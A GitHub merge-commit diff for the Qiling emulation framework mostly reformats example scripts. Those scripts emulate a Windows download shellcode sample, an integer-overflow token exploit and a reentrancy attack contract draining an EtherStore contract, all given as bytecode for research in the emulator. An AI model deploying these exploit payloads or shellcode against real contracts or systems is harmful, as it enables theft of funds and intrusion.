Merge pull request #1368 from qilingframework/dev

Getting ready for 1.4.6
qilingframework · Aug 4, 2023 · 9e081b4 · 9e081b4
2 parents d921cb2 + 1a92844
commit 9e081b4
Show file tree

Hide file tree

Showing 199 changed files with 13,697 additions and 11,819 deletions.
diff --git a/CREDITS.md b/CREDITS.md
@@ -18,6 +18,7 @@
 - KONG ziqiao (lazymio) <mio_at_lazym_io>
 - YU zheng (dataisland) <dataisland_at_outlook_com>
 - Eli Cohen Nehemia (elicn) <elichn_at_gmail_com>
+- Li Hong Jhe (ucgJhe) <ucg.jhe_at_gamil_com>
 
 
 #### CI, Website，Documentations, Logo & Swags

diff --git a/ChangeLog b/ChangeLog
@@ -1,7 +1,7 @@
 This file details the changelog of Qiling Framework.
 
 ------------------------------------
-[Version 1.4.5]: December 29th, 2022
+[Version 1.4.5]: December 31st, 2022
 
 New features:
 - Qdb with PE (#1295)
@@ -41,7 +41,6 @@ Contributors:
 - ucgJhe
 - aquynh
 - owl129
-- 
 
 ------------------------------------
 [Version 1.4.4]: September 24th, 2022

diff --git a/examples/adcache_x86_windows_debug.py b/examples/adcache_x86_windows_debug.py
@@ -3,17 +3,18 @@
 # Cross Platform and Multi Architecture Advanced Binary Emulation Framework
 #
 
+from zipfile import ZipFile
+
 import sys
 sys.path.append("..")
 
-from zipfile import ZipFile
 from qiling import Qiling
-from qiling.const import QL_VERBOSE
+from qiling.const import QL_ARCH, QL_OS, QL_VERBOSE
 
 if __name__ == "__main__":
     with ZipFile("shellcodes/win32_https_download.zip") as zip_reader:
         with zip_reader.open('win32_https_download.bin', 'r', b'infected') as f:
             sc = f.read()
 
-    ql = Qiling(code=sc, archtype="x86", ostype="windows", rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG)
+    ql = Qiling(code=sc, archtype=QL_ARCH.X86, ostype=QL_OS.WINDOWS, rootfs="rootfs/x86_windows", verbose=QL_VERBOSE.DEBUG)
     ql.run()
diff --git a/examples/doogie_8086_crack.py b/examples/doogie_8086_crack.py
@@ -1,15 +1,22 @@
 #!/usr/bin/env python3
-# 
+#
 # Cross Platform and Multi Architecture Advanced Binary Emulation Framework
 #
 
-import sys, curses, math, struct, string, time
+import curses
+import math
+import string
+import time
+
+from struct import pack
+
+import sys
 sys.path.append("..")
-from qiling import *
+
+from qiling import Qiling
 from qiling.const import *
 from qiling.os.disk import QlDisk
 from qiling.os.dos.utils import BIN2BCD
-from struct import pack
 
 
 # https://stackoverflow.com/questions/9829578/fast-way-of-counting-non-zero-bits-in-positive-integer
@@ -129,9 +136,7 @@ def show_once(ql: Qiling, key):
 # In this stage, we show every key.
 def third_stage(keys):
     # To setup terminal again, we have to restart the whole program.
-    ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], 
-                 "rootfs/8086",
-                 console=False)
+    ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], "rootfs/8086", console=False)
     ql.add_fs_mapper(0x80, QlDisk("rootfs/8086/doogie/doogie.DOS_MBR", 0x80))
     ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)
     hk = ql.hook_code(stop, begin=0x8018, end=0x8018)
@@ -170,21 +175,22 @@ def read_until_zero(ql: Qiling, addr):
         addr += 1
     return buf
 
+
 def set_required_datetime(ql: Qiling):
     ql.log.info("Setting Feburary 06, 1990")
     ql.arch.regs.ch = BIN2BCD(19)
-    ql.arch.regs.cl = BIN2BCD(1990%100)
+    ql.arch.regs.cl = BIN2BCD(1990 % 100)
     ql.arch.regs.dh = BIN2BCD(2)
     ql.arch.regs.dl = BIN2BCD(6)
 
+
 def stop(ql, addr, data):
     ql.emu_stop()
 
+
 # In this stage, we get the encrypted data which xored with the specific date.
 def first_stage():
-    ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], 
-                 "rootfs/8086",
-                 console=False)
+    ql = Qiling(["rootfs/8086/doogie/doogie.DOS_MBR"], "rootfs/8086", console=False)
     ql.add_fs_mapper(0x80, QlDisk("rootfs/8086/doogie/doogie.DOS_MBR", 0x80))
     # Doogie suggests that the datetime should be 1990-02-06.
     ql.os.set_api((0x1a, 4), set_required_datetime, QL_INTERCEPT.EXIT)

diff --git a/examples/evm/evm_Hexagon_overflow.py b/examples/evm/evm_Hexagon_overflow.py
@@ -1,20 +1,21 @@
 #!/usr/bin/env python3
-# 
+#
 # Cross Platform and Multi Architecture Advanced Binary Emulation Framework
 #
 
 # https://etherscan.io/tx/0x9243d45ca81db4f16a0ded3e57982b4bc95ec32ce69d541bf6e019d949cbc6c8
 # https://www.anquanke.com/post/id/145520
 
 import sys
-
 sys.path.append("../..")
-from qiling import *
+
+from qiling import Qiling
+from qiling.const import QL_ARCH
 
 
 def example_run_evm():
     contract = '0x606060405266017dfcdece4000600055341561001a57600080fd5b600160a060020a033316600090815260016020526040902066017dfcdece400090556106eb8061004b6000396000f3006060604052600436106100c45763ffffffff7c010000000000000000000000000000000000000000000000000000000060003504166306fdde0381146100c9578063095ea7b31461015357806318160ddd1461018957806323b872dd146101ae57806327edf097146101d6578063313ce567146101ff578063378dc3dc1461021257806342966c681461022557806370a082311461023b578063771282f61461025a57806395d89b411461026d578063a9059cbb14610280578063dd62ed3e146102a2575b600080fd5b34156100d457600080fd5b6100dc6102c7565b60405160208082528190810183818151815260200191508051906020019080838360005b83811015610118578082015183820152602001610100565b50505050905090810190601f1680156101455780820380516001836020036101000a031916815260200191505b509250505060405180910390f35b341561015e57600080fd5b610175600160a060020a03600435166024356102fe565b604051901515815260200160405180910390f35b341561019457600080fd5b61019c6103a4565b60405190815260200160405180910390f35b34156101b957600080fd5b610175600160a060020a03600435811690602435166044356103aa565b34156101e157600080fd5b6101e9610422565b60405160ff909116815260200160405180910390f35b341561020a57600080fd5b6101e9610427565b341561021d57600080fd5b61019c61042c565b341561023057600080fd5b610175600435610437565b341561024657600080fd5b61019c600160a060020a03600435166104ea565b341561026557600080fd5b61019c6104fc565b341561027857600080fd5b6100dc610502565b341561028b57600080fd5b610175600160a060020a0360043516602435610539565b34156102ad57600080fd5b61019c600160a060020a036004358116906024351661054f565b60408051908101604052600781527f48657861676f6e00000000000000000000000000000000000000000000000000602082015281565b60008115806103305750600160a060020a03338116600090815260026020908152604080832093871683529290522054155b151561033b57600080fd5b600160a060020a03338116600081815260026020908152604080832094881680845294909152908190208590557f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9259085905190815260200160405180910390a350600192915050565b60005490565b600160a060020a03808416600090815260026020908152604080832033909416835292905290812054829010156103e057600080fd5b600160a060020a038085166000908152600260209081526040808320339094168352929052208054839003905561041884848461056c565b5060019392505050565b600281565b600481565b66017dfcdece400081565b600160a060020a0333166000908152600160205260408120548290101561045d57600080fd5b600160a060020a033316600081815260016020526040808220805486900390558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980548601905581548590039091557fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca59084905190815260200160405180910390a2506001919050565b60016020526000908152604090205481565b60005481565b60408051908101604052600381527f4858470000000000000000000000000000000000000000000000000000000000602082015281565b600061054633848461056c565b50600192915050565b600260209081526000928352604080842090915290825290205481565b600160a060020a038216151561058157600080fd5b600160a060020a038316600090815260016020526040902054600282019010156105aa57600080fd5b600160a060020a038216600090815260016020526040902054818101116105d057600080fd5b600160a060020a03808416600081815260016020526040808220805460011990879003810190915593861682528082208054860190558180527fa6eef7e35abe7026729641147f7915573c7e97b47efa546f5f6e3230263bcb4980546002908101909155825490940190915590917fcc16f5dbb4873280815c1ee09dbd06736cffcc184412cf7a71a0fdb75d397ca5915160ff909116815260200160405180910390a281600160a060020a031683600160a060020a03167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef8360405190815260200160405180910390a35050505600a165627a7a72305820fbef5b10322242b8659b5de8e24ec1cf5e809831f6f7c08e52112f76daa31aef0029'
-    ql = Qiling(code=contract, archtype="evm")
+    ql = Qiling(code=contract, archtype=QL_ARCH.EVM)
 
     user1 = ql.arch.evm.create_account(balance=100*10**18)
     user2 = ql.arch.evm.create_account(balance=100*10**18)
@@ -36,9 +37,10 @@ def check_balance(sender, destination):
     # # SMART CONTRACT DEPENDENT: transform from user1 to user2
     call_data = '0xa9059cbb'+ ql.arch.evm.abi.convert(['address'], [user2]) + \
                                     ql.arch.evm.abi.convert(['uint256'], [0xfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffe])
-    msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)    
+    msg1 = ql.arch.evm.create_message(user1, c1, data=call_data)
     result = ql.run(code=msg1)
-    if int(result.output.hex()[2:], 16) ==  1:
+
+    if int(result.output.hex()[2:], 16) == 1:
         print('User1 transfered Token to User1')
 
     # # SMART CONTRACT DEPENDENT: User1 balance underflow, MAX - 1
@@ -48,5 +50,6 @@ def check_balance(sender, destination):
     result = check_balance(user2, c1)
     print('User2 final balance =', int(result.output.hex()[2:], 16))
 
+
 if __name__ == "__main__":
-    example_run_evm()
+    example_run_evm()
diff --git a/examples/evm/evm_debugger.py b/examples/evm/evm_debugger.py
@@ -1,16 +1,18 @@
 #!/usr/bin/env python3
-# 
+#
 # Cross Platform and Multi Architecture Advanced Binary Emulation Framework
 #
 
 import sys
-
 sys.path.append("../..")
-from qiling import *
+
+from qiling import Qiling
+from qiling.const import QL_ARCH
+
 
 if __name__ == '__main__':
     contract = '0x6060604052341561000f57600080fd5b60405160208061031c833981016040528080519060200190919050508060018190556000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050610299806100836000396000f300606060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff16806318160ddd1461005c57806370a0823114610085578063a9059cbb146100d2575b600080fd5b341561006757600080fd5b61006f61012c565b6040518082815260200191505060405180910390f35b341561009057600080fd5b6100bc600480803573ffffffffffffffffffffffffffffffffffffffff16906020019091905050610132565b6040518082815260200191505060405180910390f35b34156100dd57600080fd5b610112600480803573ffffffffffffffffffffffffffffffffffffffff1690602001909190803590602001909190505061017a565b604051808215151515815260200191505060405180910390f35b60015481565b60008060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b600080826000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205403101515156101cb57600080fd5b816000803373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008282540392505081905550816000808573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254019250508190555060019050929150505600a165627a7a7230582098f1551a391a3e65b3ce45cfa2b3fa5f91eea9a3e7181a81454e025ea0d7151c0029'
-    ql = Qiling(code=contract, archtype="evm")
+    ql = Qiling(code=contract, archtype=QL_ARCH.EVM)
     ql.debugger = True
 
     # Add Balance Var to the contract

diff --git a/examples/evm/evm_reentrancy.py b/examples/evm/evm_reentrancy.py
@@ -1,22 +1,23 @@
 #!/usr/bin/env python3
-# 
+#
 # Cross Platform and Multi Architecture Advanced Binary Emulation Framework
 #
 
 import sys
-
 sys.path.append("../..")
-from qiling import *
+
+from qiling import Qiling
 from qiling.arch.evm.vm.utils import bytecode_to_bytes, runtime_code_detector
 from qiling.arch.evm.vm.vm import BaseVM
 from qiling.arch.evm.constants import CREATE_CONTRACT_ADDRESS
+from qiling.const import QL_ARCH
 
 
 if __name__ == '__main__':
     # Attack_contract     = '0x608060405234801561001057600080fd5b5060405160208061046d83398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff160217905550506103ea806100836000396000f300608060405260043610610057576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680636289d38514610152578063acd2e6e51461015c578063ff11e1db146101b3575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610150576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561013757600080fd5b505af115801561014b573d6000803e3d6000fd5b505050505b005b61015a6101ca565b005b34801561016857600080fd5b50610171610339565b604051808273ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200191505060405180910390f35b3480156101bf57600080fd5b506101c861035e565b005b670de0b6b3a764000034101515156101e157600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663e2c41dbc670de0b6b3a76400006040518263ffffffff167c01000000000000000000000000000000000000000000000000000000000281526004016000604051808303818588803b15801561026e57600080fd5b505af1158015610282573d6000803e3d6000fd5b50505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663155dd5ee670de0b6b3a76400006040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040180828152602001915050600060405180830381600087803b15801561031f57600080fd5b505af1158015610333573d6000803e3d6000fd5b50505050565b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1681565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f193505050501580156103bb573d6000803e3d6000fd5b505600a165627a7a723058204ad3139b1085c12112b76e9eab70c6589942d6e84eb3d8329a644eca757c19d00029'
     Attack_contract     = '0x608060405234801561001057600080fd5b506040516020806104b883398101806040528101908080519060200190929190505050806000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050610435806100836000396000f30060806040526004361061004c576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff168063a75e462514610179578063ff11e1db146101e1575b670de0b6b3a76400006000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16311115610177576000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16600060149054906101000a90047c0100000000000000000000000000000000000000000000000000000000027c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505b005b6101df60048036038101908080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff1916906020019092919080357bffffffffffffffffffffffffffffffffffffffffffffffffffffffff191690602001909291905050506101f8565b005b3480156101ed57600080fd5b506101f66103a9565b005b80600060146101000a81548163ffffffff02191690837c010000000000000000000000000000000000000000000000000000000090040217905550670de0b6b3a7640000341015151561024a57600080fd5b6000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16670de0b6b3a7640000837c01000000000000000000000000000000000000000000000000000000009004906040518263ffffffff167c010000000000000000000000000000000000000000000000000000000002815260040160006040518083038185885af19350505050506000809054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16817c01000000000000000000000000000000000000000000000000000000009004670de0b6b3a76400006040518263ffffffff167c0100000000000000000000000000000000000000000000000000000000028152600401808267ffffffffffffffff1681526020019150506000604051808303816000875af192505050505050565b3373ffffffffffffffffffffffffffffffffffffffff166108fc3073ffffffffffffffffffffffffffffffffffffffff16319081150290604051600060405180830381858888f19350505050158015610406573d6000803e3d6000fd5b505600a165627a7a723058205aacb19a5864d2c460aed6c844f2aca575d87de6477ac757a72511bb2975b3f80029'
 
-    ql = Qiling(code=Attack_contract, archtype="evm")
+    ql = Qiling(code=Attack_contract, archtype=QL_ARCH.EVM)
     vm:BaseVM = ql.arch.evm.vm
 
     C1 = b'\xaa' * 20
@@ -28,9 +29,9 @@
     ql.arch.evm.create_account(C2)
     ql.arch.evm.create_account(User1, 100*10**18)
     ql.arch.evm.create_account(User2, 100*10**18)
-    
+
     EtherStore_contract = '0x6080604052670de0b6b3a764000060005534801561001c57600080fd5b506103b08061002c6000396000f30060806040526004361061006d576000357c0100000000000000000000000000000000000000000000000000000000900463ffffffff1680631031ec3114610072578063155dd5ee146100c957806327e235e3146100f65780637ddfe78d1461014d578063e2c41dbc14610178575b600080fd5b34801561007e57600080fd5b506100b3600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610182565b6040518082815260200191505060405180910390f35b3480156100d557600080fd5b506100f46004803603810190808035906020019092919050505061019a565b005b34801561010257600080fd5b50610137600480360381019080803573ffffffffffffffffffffffffffffffffffffffff169060200190929190505050610317565b6040518082815260200191505060405180910390f35b34801561015957600080fd5b5061016261032f565b6040518082815260200191505060405180910390f35b610180610335565b005b60016020528060005260406000206000915090505481565b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054101515156101e857600080fd5b60005481111515156101f957600080fd5b62093a80600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000205401421015151561024c57600080fd5b3373ffffffffffffffffffffffffffffffffffffffff168160405160006040518083038185875af192505050151561028357600080fd5b80600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000206000828254039250508190555042600160003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555050565b60026020528060005260406000206000915090505481565b60005481565b34600260003373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055505600a165627a7a72305820707bf0ae11ce52ff7b7846ede3497d41b6fadea29579773fc70e8e61c0f549f10029'
-    
+
     print('Init Victim   balance is', vm.state.get_balance(User1)/10**18)
     print('Init Attacker balance is', vm.state.get_balance(User2)/10**18)
 
@@ -66,7 +67,7 @@
     res_code = bytecode_to_bytes(res.output)
     runtime_code, aux_data, constructor_args = runtime_code_detector(res_code)
     rt_code1 = bytecode_to_bytes(runtime_code)
-    
+
     print('\n------ Attacker deposit 1 ETH to DeFi contract, Start Reentrancy Attack')
     # 4. User2 pwnEtherStore with 1ETH
     call_data = '0xa75e4625' + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0xe2c41dbc')]) + ql.arch.evm.abi.convert(['bytes4'], [bytecode_to_bytes('0x155dd5ee')])